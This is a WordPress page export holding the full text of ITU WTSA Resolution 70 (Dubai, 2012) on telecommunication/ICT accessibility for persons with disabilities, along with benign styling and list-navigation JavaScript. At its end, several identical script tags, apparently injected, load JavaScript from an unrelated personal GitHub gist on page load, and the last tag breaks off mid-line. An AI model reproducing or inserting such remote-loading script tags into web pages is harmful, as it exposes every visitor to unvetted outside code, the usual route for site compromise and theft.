{"id":717,"date":"2013-06-18T22:36:09","date_gmt":"2013-06-19T02:36:09","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=717"},"modified":"2015-06-30T00:32:46","modified_gmt":"2015-06-30T04:32:46","slug":"wtsa_70","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtsa\/wtsa-2012\/wtsa_70\/","title":{"rendered":"WTSA Resolution 70"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">WTSA RESOLUTION 70 (Rev. Dubai, 2012)<\/span><\/h3>\n<h4><span style=\"\">Telecommunication\/information and communication technology accessibility for persons with disabilities<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Standardization Assembly (Dubai, 2012),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        Resolution 175 (Guadalajara, 2010) of the Plenipotentiary Conference, on telecommunication\/information and communication technology (ICT) accessibility for persons with disabilities, including age-related disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        Resolution 58 (Hyderabad, 2010) of the World Telecommunication Development Conference (WTDC), on access to ICT for persons with disabilities, including persons with age-related disabilities, and WTDC Resolution 70 (Hyderabad, 2010), on a regional initiative for Central and Eastern Europe on &#8220;E-accessibility (Internet and digital television) for persons with disabilities&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        the mandate of and work carried by the Joint Coordination Activity on Accessibility and Human Factors (JCA-AHF), and in particular ITU Telecommunication Standardization Sector (ITU-T) actions to increase cooperation with other United Nations organizations and activities, as well as all United Nations specialized agencies, in order to raise awareness about ICT accessibility in the framework of standardization, and ITU-T actions aimed at upholding JCA-AHF;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        studies under ITU-T Question 4\/2, on human factors-related issues for improvement of the quality of life through international telecommunications;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        studies under ITU-T Question 26\/16, on accessibility to multimedia systems and services, including the recent Recommendation ITU-T F.790 on telecommunication accessibility guidelines for older persons and persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        studies under Question 20\/1 of the ITU Telecommunication Development Sector (ITU-D), on access to telecommunication services for people with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        ongoing work in the ITU Radiocommunication Sector (ITU-R) to bridge the digital disability divide;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)        the publication by the Telecommunication Standardization Advisory Group (TSAG) of the guide for ITU study groups &#8211; &#8220;Considering End-User Needs in developing Recommendations&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">i)        the creation by ITU-T Study Group 2 of JCA-AHF for the purposes of awareness-raising, advice, assistance, collaboration, coordination and networking;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">j)        the mandate of and work carried out by ITU-T Study Group 16, the parent group of the Focus Group on Audiovisual Media Accessibility (FG-AVA), meeting the need to make audiovisual means accessible to persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">k)        the activity carried out by the Internet Governance Forum Dynamic Coalition on Accessibility and Disability (DCAD) sponsored by the Director of the Telecommunication Standardization Bureau (TSB), and the partnership between ITU-T and DCAD for the purposes of maximizing the benefits for all sectors of the global community of electronic communications and online information through the Internet,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that Article 9, on accessibility, of the United Nations Convention on the Rights of Persons with Disabilities (UNCRDP), which entered into force on 3 May 2008, provides as follows: &#8220;To enable persons with disabilities to live independently and participate fully in all aspects of life, States Parties shall take appropriate measures to ensure to persons with disabilities access, on an equal basis with others, to the physical environment, to transportation, to information and communications, including information and communications technologies and systems, and to other facilities and services open or provided to the public, both in urban and in rural areas. These measures, which shall include the identification and elimination of obstacles and barriers to accessibility&#8221;;<\/span><\/li>\n<li class=\"col\" style=\"\"><span style=\"\">b)        that \u00a7\u00a7 (2)(g) and (2)(h) of the same article of that Convention requires that States Parties take appropriate measures:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\" style=\"\"><span style=\"\">i)        9(2)(g) &#8220;to promote access for persons with disabilities to new information and communications technologies and systems, including the Internet&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">ii)        9(2)(h) &#8220;to promote the design, development, production and distribution of accessible information and communications technologies and systems at an early stage, so that these technologies and systems become accessible at minimum cost&#8221;,<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that the World Health Organization estimates that more than one billion of the world&#8217;s population live with some form of disability, of whom almost 200 million experience considerable difficulty in their daily lives, and it is to be expected that, in the future, disabilities will rise because of the increasing population of older persons and the risk that disability is greater among older persons;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that over the past 60 years, the approach to disability adopted by United Nations agencies, and by many Member States (through a changed emphasis in their laws, regulations, policies and programmes), has moved from a health and welfare perspective to an approach based on human rights, which recognizes that people with disabilities are people first, and that society places barriers upon them as opposed to their disabilities, and which includes the goal of full participation in society by persons with disabilities (Resolution 175 (Guadalajara, 2010));<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that maximizing the accessibility and usability of telecommunication\/ICT services, products and terminals through universal design will increase their uptake by persons with disabilities and older persons, and thereby increase revenues;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that United Nations General Assembly Resolution A\/RES\/61\/106 adopting the Convention on the rights of persons with disabilities requests the Secretary-General (\u00a7 5) &#8220;&#8230; to implement progressively standards and guidelines for the accessibility of facilities and services of the United Nations system, taking into account relevant provisions of the Convention, in particular when undertaking renovations&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        the importance of cooperation between governments, the private sector and relevant organizations to promote affordable access possibilities,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recalling<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        \u00a7 18 of the Tunis Commitment, made at the second phase of the World Summit on the Information Society (Tunis, 2005): &#8220;We shall strive unremittingly, therefore, to promote universal, ubiquitous, equitable and affordable access to ICTs, including universal design and assistive technologies, for all people, especially those with disabilities, everywhere, to ensure that the benefits are more evenly distributed between and within societies, &#8230;&#8221;1;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        the Phuket Declaration on Tsunami Preparedness for Persons with Disabilities (Phuket, 2007), which emphasizes the need for inclusive emergency warning and disaster management systems using telecommunication\/ICT facilities based on open, non-proprietary, global standards,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">taking into account<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        Resolution 44 (Rev. Dubai, 2012) of this assembly, on bridging the standardization gap between developing and developed countries, and Resolution 57 (Rev. Dubai, 2012) of this assembly, on strengthening coordination and cooperation among the three ITU Sectors on matters of mutual interest;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        Resolution GSC-14\/27 (revised), on telecommunication\/ICT accessibility for persons with disabilities, agreed upon at the 14th Global Standards Collaboration meeting (Geneva, 2009; Halifax, 2011), which advocates greater collaboration between world, regional and national standardization bodies as a basis for establishing and\/or strengthening activities and initiatives concerning the use of telecommunications\/ICTs for persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        Resolution GSC-13\/26 (revised), on user needs, considerations and involvement, agreed upon at the 13th Global Standards Collaboration meeting (Boston, 2008; Halifax, 2011);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        publications and ongoing work of the Special Working Group on Accessibility (ISO\/IEC JTC 1 SWG &#8211; Accessibility) of the Joint Technical Committee on Information Technology (JTC 1) of the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC), as well as the Mandate 376 project teams, in identifying user needs and in developing a comprehensive inventory of existing standards as part of the ongoing effort to identify areas where research or new standards work is needed;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        the activities of the ITU-T study groups in charge of accessibility to ICTs: ITU-T Study Group 16 (Multimedia coding, systems and applications), which is the lead study group on telecommunications\/ICT accessibility for persons with disabilities, and ITU-T Study Group 2 (Operational aspects of service provision and telecommunication management) for the part relating to human factors;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        activities relating to the development of new standards (e.g. ISO TC 159, JTC 1 SC35, IEC TC100, ETSI TC HF, and W3C WAI), and the implementation and maintenance of existing standards (e.g. ISO 9241-171);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        the formation of the Global Initiative for Inclusive ICTs (G3ICT), a flagship partnership initiative of the United Nations Global Alliance for ICT and Development (UN-GAID);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)        the joint ITU and G3ict release of the Report &#8220;Making TV accessible&#8221;, on the occasion of the International Day of Persons with Disabilities (3 December 2011), and the report on &#8220;Making mobile phones and services accessible to persons with disabilities&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">i)        various regional and national efforts to develop or revise guidelines and standards for telecommunication\/ICT accessibility, compatibility and usability by persons with disabilities,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        that Study Group 2, Study Group 16 and JCA-AHF shall continue giving high priority to work on the relevant Questions, in accordance with the accessibility guidelines, as shown in the guide for ITU-T study groups: &#8220;Considering End-User Needs in developing Recommendations&#8221; &#8211; facilitating the implementation of new software, services and proposals that enable all persons with disabilities, including persons with age-related disabilities, to effectively use telecommunication\/ICT services; the &#8220;ITU-T Technical Paper, Telecommunications Accessibility Checklist&#8221; for standards writers; and Recommendation ITU-T F.790 on telecommunication accessibility guidelines for older persons and persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        that ITU study groups draft proposals to achieve greater accessibility to telecommunications\/ICTs, combining the drafting of non-discriminatory standards, service regulations and measures for all persons with disabilities, including older persons with age-related disabilities, with cross-cutting user-protection actions;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to ask all ITU-T study groups to utilize the Telecommunications Accessibility Checklist, which makes it possible to incorporate the principles of universal design and accessibility;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        that an ITU workshop be held to inform about the progress in the work and the results achieved by the study groups in charge of ICT accessibility before the next world telecommunication standardization assembly,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Member States and Sector Members<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to consider developing, within their national legal frameworks, guidelines or other mechanisms to enhance the accessibility, compatibility and usability of telecommunication\/ICT services, products and terminals;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to consider introducing telecommunication relay services2 to enable persons with hearing and speech disabilities to utilize telecommunication services that are functionally equivalent to telecommunication services for persons without disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to participate actively in accessibility-related studies in ITU-T, ITU-R and ITU-D, and to encourage and promote self-representation by persons with disabilities in the standardization process so as to ensure their experiences, views and opinions are taken into account in all the work of study groups;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to encourage the provision of differentiated and affordable service plans for persons with disabilities in order to increase the accessibility and usability of telecommunications\/ICT for these persons;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to encourage the development of applications for telecommunication products and terminals to increase the accessibility and usability of telecommunications\/ICT for persons with visual, auditory, verbal and other physical and mental disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        to encourage regional telecommunication organizations to contribute to the work and consider implementing the results achieved in the study groups and the workshop on this topic,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Director of the Telecommunication Standardization Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to report to the ITU Council on the implementation of this resolution,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites the Director of the Telecommunication Standardization Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to identify and document examples of best practice for accessibility in the field of telecommunication\/ICT for dissemination among ITU Member States and Sector Members;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to review the accessibility of ITU-T services and facilities and consider making changes, where appropriate, pursuant to United Nations General Assembly Resolution 61\/106, and to report to the Council on these matters;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to work collaboratively on accessibility-related activities with the Directors of the Radiocommunication Bureau (BR) and the Telecommunication Development Bureau (BDT), in particular concerning awareness and mainstreaming of telecommunication\/ICT accessibility standards, reporting findings to the Council as appropriate;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to work collaboratively on accessibility-related activities with ITU-D, in particular developing programmes that enable developing countries to introduce services that allow persons with disabilities to utilize telecommunication services effectively;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to work collaboratively and cooperatively with other standardization organizations and entities, in particular, in the interest of ensuring that ongoing work in the field of accessibility is taken into account, in order to avoid duplication;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        to work collaboratively and cooperatively with disability organizations in all regions to ensure that the needs of the disabled community are taken into account in all standardization matters;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7        to contribute to the development of an ITU-wide internship programme for people with disabilities who have expertise in the field of ICTs, so as to build capacity among people with disabilities in the standards-making process and to raise awareness within ITU-T of the needs of persons with disabilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">8        to continue the accessibility coordination and advisory function within ITU-T in order to assist the Director of TSB in reporting the findings of the review of ITU-T services and facilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">9        to consider using accessibility resources in the meetings organized by ITU-T in order to encourage the participation of persons with disabilities in the standardization process,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Telecommunication Standardization Advisory Group<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to revise the guide for ITU study groups &#8211; &#8220;Considering End-User Needs in developing Recommendations&#8221;,<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to request study groups to facilitate, in their respective work, the implementation of new software, services and proposals enabling all persons with disabilities, including persons with age-related disabilities, to effectively use telecommunication\/ICT services, and relevant guidelines for end-user needs, in order specifically to include the needs of persons with disabilities, and to update this guide on a regular basis, based on contributions from Member States and Sector Members as well as the ITU-T study groups, as appropriate.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' 